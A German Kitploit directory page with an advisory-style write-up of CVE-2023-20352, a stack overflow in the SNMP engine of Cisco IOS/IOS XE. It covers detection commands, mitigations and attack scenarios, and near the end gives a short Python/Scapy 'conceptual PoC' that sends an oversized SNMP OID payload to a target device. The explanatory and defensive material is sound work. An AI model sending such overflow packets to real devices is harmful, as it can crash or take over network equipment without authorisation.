Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices — CVE-2023-20352 ist ein kritischer Stack-Overflow-Fehler in der SNMP-Engine von Cisco IOS/IOS XE. Mit nur präparierten SNMP-Paketen können entfernte Angreifer Systeme zum Absturz bringen oder Root-Kontrolle erlangen. Alle SNMP-Versionen sind anfällig – patchen Sie jetzt oder riskieren Sie einen vollständigen Kompromiss. | Kitploit
Tools/GitHubGitHub/mrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices
Exploit-FrameworksSchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsLernen & Bildung
GitHubmrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices

SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices

Repository anzeigen
4vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2023-20352 ist ein kritischer Stack-Overflow-Fehler in der SNMP-Engine von Cisco IOS/IOS XE. Mit nur präparierten SNMP-Paketen können entfernte Angreifer Systeme zum Absturz bringen oder Root-Kontrolle erlangen. Alle SNMP-Versionen sind anfällig – patchen Sie jetzt oder riskieren Sie einen vollständigen Kompromiss.

Teilen

SNMPocalypse-Cisco-Fehler-lässt-Hacker-Geräte-zum-Absturz-bringen-oder-steuern

CVE-2023-20352 ist ein kritischer Stack-Überlauf-Fehler in der SNMP-Engine von Cisco IOS/IOS XE. Mit nur präparierten SNMP-Paketen können entfernte Angreifer Systeme zum Absturz bringen oder die Root-Kontrolle übernehmen. Alle SNMP-Versionen sind betroffen – patchen Sie jetzt oder riskieren Sie eine vollständige Kompromittierung.

Von Mark Malllia

Einführung in SNMP

Das Simple Network Management Protocol (SNMP) ist ein grundlegendes Protokoll in der Netzwerkverwaltung, das Systemadministratoren die Überwachung, Konfiguration und Verwaltung von Netzwerkgeräten ermöglicht. Es arbeitet auf Port 161 (für SNMP-Anfragen) und Port 162 (für Traps). SNMP unterstützt drei Versionen: v1, v2c und v3, die jeweils unterschiedliche Sicherheitsstufen bieten. Das trifft mich persönlich, da meine Abschlussarbeit sich mit SNMP befasste und Cisco in meinem täglichen Arbeit eine feste Größe ist.

SNMP wird für Echtzeit-Überwachung, Bestandsverwaltung und Fehlererkennung in Netzwerken eingesetzt. Trotz seiner Bedeutung birgt die Rolle von SNMP in der Netzwerkverwaltung auch Sicherheitsrisiken, wenn es nicht ordnungsgemäß abgesichert ist, wie die Schwachstelle CVE-2023-20352 zeigt.

Was schiefgelaufen ist: CVE-2023-20352 erklärt

CVE-2023-20352 ist ein schwerwiegender Stack-basierter Pufferüberlauf-Fehler, der Cisco IOS- und IOS XE-Geräte betrifft. Er befindet sich im SNMP-Subsystem, das den Netzwerkverwaltungsverkehr verarbeitet.

Technische Details:

  • Schwachstellentyp: Stack-basierter Pufferüberlauf (CWE-121)
  • CVSS-Score: 7.7 (Hoch)
  • Auswirkung: Potenzielle Denial-of-Service (DoS) oder Remote-Codeausführung (RCE)
  • Die Schwachstelle wird durch präparierte SNMP-Pakete ausgelöst, die an ein anfälliges Gerät gesendet werden, was zu einer fehlerhaften Bereichsprüfung und einem Stack-Überlauf führt. Alle SNMP-Versionen sind betroffen.

    Angriffsszenarien

    1. Angriff mit niedrigen Privilegien:

      • Erforderlicher Zugriff: SNMPv2c-Lese-String oder SNMPv3-Anmeldedaten.
      • Auswirkung: Neustart des Geräts (DoS).
    2. Angriff mit hohen Privilegien:

      • Erforderlicher Zugriff: SNMPv1/v2c-String mit Anmeldedaten der Privilegienstufe 15.
      • Auswirkung: Vollständige RCE als Root.

    Erkennung & Überprüfung

    Zur Erkennung von Schwachstellen können Administratoren die folgenden CLI-Befehle verwenden:

    root@kitploit:~
    show running-config | include snmp-server community
    show running-config | include snmp-server group
    show snmp
    

    Absichern: Maßnahmen zur Eindämmung

    • Patch-Installation: Cisco hat Firmware-Patches für betroffene Plattformen veröffentlicht.
    • SNMP-Zugriff einschränken: Beschränken Sie den Zugriff auf vertrauenswürdige IPs, falls Sie dies noch nicht getan haben.
    • Anfällige OIDs deaktivieren: Verwenden Sie Befehle wie snmp-server view <view-name> <OID> excluded.

    Wie Angreifer es ausnutzen können

    Ein konzeptioneller PoC mit Python und Scapy zeigt die Ausnutzbarkeit:

    root@kitploit:~
    from scapy.all import *
    
    # Ziel-IP und SNMP-Community-String ersetzen
    target_ip = "192.168.1.1"
    community = "public"
    
    # Bösartiges Paket erstellen
    payload = b"A" * 1024  # Pufferüberlauf
    packet = IP(dst=target_ip)/UDP(dport=161)/SNMP(community=community, PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)]))
    
    send(packet)
    

    Hinweis: Dies ist ein vereinfachtes Beispiel. Eine tatsächliche Ausnutzung erfordert präzise Nutzlast-Erstellung und Privilegienausweitung.

    Fazit

    Die Schwachstelle CVE-2023-20352 unterstreicht die entscheidende Rolle von SNMP und die damit verbundenen Risiken. Organisationen müssen die Patch-Installation und die Absicherung von SNMP-Konfigurationen priorisieren, um Bedrohungen zu entschärfen und die Netzwerkresilienz gegen neue Angriffe zu gewährleisten.

    Tool herunterladen